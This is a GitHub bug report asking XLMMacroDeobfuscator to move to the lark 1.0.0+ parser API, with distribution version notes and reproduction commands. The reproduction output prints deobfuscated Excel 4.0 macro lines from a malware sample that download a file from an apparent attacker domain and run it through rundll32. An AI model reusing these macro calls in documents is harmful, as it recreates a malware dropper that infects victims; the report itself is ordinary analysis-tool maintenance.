XLMMacroDeobfuscator
Old version/repository of lark used
Hello, please could you consider updating the API of the lark parser to the current API (1.0.0+)? The PyPI project lark-parser was renamed to lark a while ago and new updates go only to the lark repository.
Versions up to 0.12.0 work (both the old lark-parser and the new lark repository), but there was a significant API change in 1.0.0 which broke the API and requires a code change in xlmmacrodeobfuscator.
I have tried packaging XLMMacroDeobfuscator for Fedora, which worked until Fedora 38 when distributions were still using the old version of lark-parser, but it is common now that the Linux distributions have switched to the new API of lark 1.0.0+.
Fedora 38 lark-parser - lark-parser 0.12.0
Fedora 39/40 lark - lark 1.1.7
Debian stable Bookworm - lark 1.1.5
Debian unstable Sid - lark 1.1.9
Ubuntu 22+ - lark 1.1.1+
===== This works python 3.12 - lark<1.0.0
virtualenv --python=$(which python3.12) p3.12
p3.12/bin/pip install setuptools
p3.12/bin/pip install xlmmacrodeobfuscator
p3.12/bin/pip uninstall lark-parser -y
p3.12/bin/pip install 'lark<1.0.0'
p3.12/bin/xlmdeobfuscator -f ~/tmp/malware/edd554502033d78ac18e4bd917d023da2fd64843c823c1be8bc273f48a5f3f5f | grep -e "CALL"
...
CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
CELL:R16 , FullEvaluation , IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
CELL:R18 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
====== This doesn't work python 3.12 - lark>1.0.0
virtualenv --python=$(which python3.12) p3.12
p3.12/bin/pip install setuptools
p3.12/bin/pip install xlmmacrodeobfuscator
p3.12/bin/pip uninstall lark-parser -y
p3.12/bin/pip install 'lark>1.0.0'
p3.12/bin/xlmdeobfuscator -f ~/tmp/malware/edd554502033d78ac18e4bd917d023da2fd64843c823c1be8bc273f48a5f3f5f | grep -e "CALL"
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
....
XLMMacroDeobfuscator(v0.2.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator
File: /home/testuser/tmp/malware/edd554502033d78ac18e4bd917d023da2fd64843c823c1be8bc273f48a5f3f5f
Unencrypted xls file
[Loading Cells]
auto_open: auto_open->'jMAhUST1Sf'!$Q$1
[Starting Deobfuscation]
Error [deobfuscator.py:2598 evaluation_result = self.evaluate_parse_tree(current_cell, parse_tree, interactive)]: 'None'